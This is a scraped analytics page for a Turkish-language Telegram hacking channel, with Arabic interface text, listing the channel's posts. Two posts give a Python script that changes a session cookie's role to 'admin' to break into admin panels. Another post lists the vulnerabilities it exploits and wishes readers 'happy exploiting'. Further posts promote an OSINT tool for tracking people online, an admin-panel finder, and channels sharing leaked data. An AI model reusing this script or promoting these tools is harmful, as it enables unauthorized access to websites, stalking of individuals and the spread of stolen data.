M Ü H Ü R
قناة بسيطة
لا توجد بيانات
المشتركون
-424 ساعات
+17 أيام
+5430 أيام
جاري تحميل البيانات...
جذب المشتركين
مايو '25
مايو '25
+2
في 0 قنوات
أبريل '25
+134
في 17 قنوات
Get PRO
مارس '25
+266
في 13 قنوات
Get PRO
فبراير '25
+279
في 3 قنوات
Get PRO
يناير '250
في 4 قنوات
Get PRO
ديسمبر '240
في 6 قنوات
Get PRO
نوفمبر '24
+140
في 7 قنوات
Get PRO
أكتوبر '24
+5
في 2 قنوات
| التاريخ | نمو المشتركين | الإشارات | القنوات | |
| 02 مايو | 0 | |||
| 01 مايو | +2 |
منشورات القناة
| 2 | Taklitler aslını yüceltir 🐦🔥 | 141 |
| 3 | Sıfırdan eğitim serisi gelsin mi? | 158 |
| 4 | SELAM DOSTLAR 🙌🏻
LOCKER'ın sizler için yazdığı Cookie Manipülasyonu ile Yetki Bypass kodunu bazı gelişmemiş sitelerde test ettik ve kodun bazı sitelerde çalıştığını fark ettik. Bu kodun hangi zaafiyetler de çalıştığını sizler için listeledik.
🔓 Zaafiyetleri aktarıyorum:
1.) Insecure Direct Object Reference (IDOR)
2.) Broken Access Control
3.) Insecure Cookie Handling
4.) Missing Authentication / Authorization
5.) Improper Session Management
6.) Lack of Input Validation / Server-side Validation
Evet, LOCKER'ın sizler için yazdığı bu bypass kodu genel olarak bu zaafiyetleri barındıran sitelerde çalışıyor. Tabii bu bir ihtimal bu zaafiyet olsa bile bazı durumlarda çalışmama gibi durumlar oluyor. Orasını da deneyerek bulacaksınız. Hepinize iyi sömürmeler 🧛🏻♂️ | 167 |
| 5 | OSINT Tool u sizce nasıl olmuş? Devamı gelsin mi? | 1 |
| 6 | Açık Kaynak Sosyal Medya İstihbarat Toolu 👍🏻
İyi kullanımlar dilerim ❤️ | 262 |
| 7 | Bu Jhon The Ripper benzeri çalışan bir sosyal medya OSINT aracıdır. Girdiğiniz kullanıcı adının hangi platformlarda bulunduğunu araştırmanıza yarar. Açık kaynaklı bir İstihbarat Tooludur. Açık kaynak atmamın nedeni dilerseniz daha fazla platform ekleyebilmeniz içindir. Siber Güvenlik Uzmanlarınında sıkça kullandığı Jhon The Ripper aracını Terminalde kurma zahmetinden kurtacak olan bu program birini İnternette takip etmek için bire bir. | 258 |
| 8 | nasılsınız | 1 |
| 9 | 👑 Her türlü verinin paylaşıldığı kanalımıza davetlisiniz 📌
https://t.me/+pnK8EyKEkyNmNDU0 | 1 |
| 10 | Bir süredir ilgilenemiyordum tekrar ilgileneceğim 👍 | 64 |
| 11 | https://t.me/+1C5h3mkDf7hiMjU0 | 65 |
| 12 | @swaregroup 🤝🤝🤝🤝 | 73 |
| 13 | Dostlar hiç emoji yok? Ayıp emeğimizin karşılığı bumu? | 1 |
| 14 | Güzel bir emoji spamda atacağım Toolu 👍🏻 | 30 |
| 15 | Selamün aleyküm dostlar bir OSINT projesi üzerinde çalışıyorum akşama doğru detayları ile kanalda paylaşmış olurum. Beklemede kalın bomba gibi bir araç gelecek 👍🏻🔥 | 112 |
| 16 | , | 1 |
| 17 | Web sitelerinde bulunan admin panellerini tespit etmek için kullanılan bir program.
- İyi kullanımlar dilerim. ❤️ | 360 |
| 18 | @swareleak dostlar data paylaşımları olacaktır bi önceki patlayan kanal baya bi ilgi görüyordu, umarım şimdide görür herkesi beklerim.... | 112 |
| 19 | import requests
giris_url = "Kullanici_girisi_url"
giris_verisi = {
"kullanici_adi": "senin_kullanici_adin",
"sifre": "senin_sifren",
}
oturum = requests.Session()
cevap = oturum.post(giris_url, data=giris_verisi)
çerezler = oturum.cookies.get_dict()
print(f"Orijinal Çerez: {çerezler}")
çerezler["rol"] = "admin"
print(f"Manipüle Edilmiş Çerez: {çerezler}")
admin_paneli_url = "admin_paneli_url"
cevap = requests.get(admin_paneli_url, cookies=çerezler)
if cevap.status_code == 200:
print("Yönetici paneline erişim sağlandı!")
print(cevap.text)
else:
print(f"Erişim sağlanamadı, durum kodu: {cevap.status_code}")
Bu bir Cookie manipüle etme kodudur. Sitenin size verdiği kimliği bir admin kimliğine çevirerek admin giriş bilgilerini Bypass etmenize yarar. Henüz test etmedim işin o kısmı artık sizde bunun yanında @Dev_Ech0 sizler için bir admin paneli bulma kodu hazırlıyor. Yani sitenizi belirleyin admin paneli bulmak için gerekli kodu Dev Echo sizler için sağlayacak. | 327 |
| 20 | import requests
giris_url = "Kullanici_girisi_url"
giris_verisi = {
"kullanici_adi": "senin_kullanici_adin",
"sifre": "senin_sifren",
}
oturum = requests.Session()
cevap = oturum.post(giris_url, data=giris_verisi)
çerezler = oturum.cookies.get_dict()
print(f"Orijinal Çerez: {çerezler}")
çerezler["rol"] = "admin"
print(f"Manipüle Edilmiş Çerez: {çerezler}")
admin_paneli_url = "admin_paneli_url"
cevap = requests.get(admin_paneli_url, cookies=çerezler)
if cevap.status_code == 200:
print("Yönetici paneline erişim sağlandı!")
print(cevap.text)
else:
print(f"Erişim sağlanamadı, durum kodu: {cevap.status_code}") | 1 |
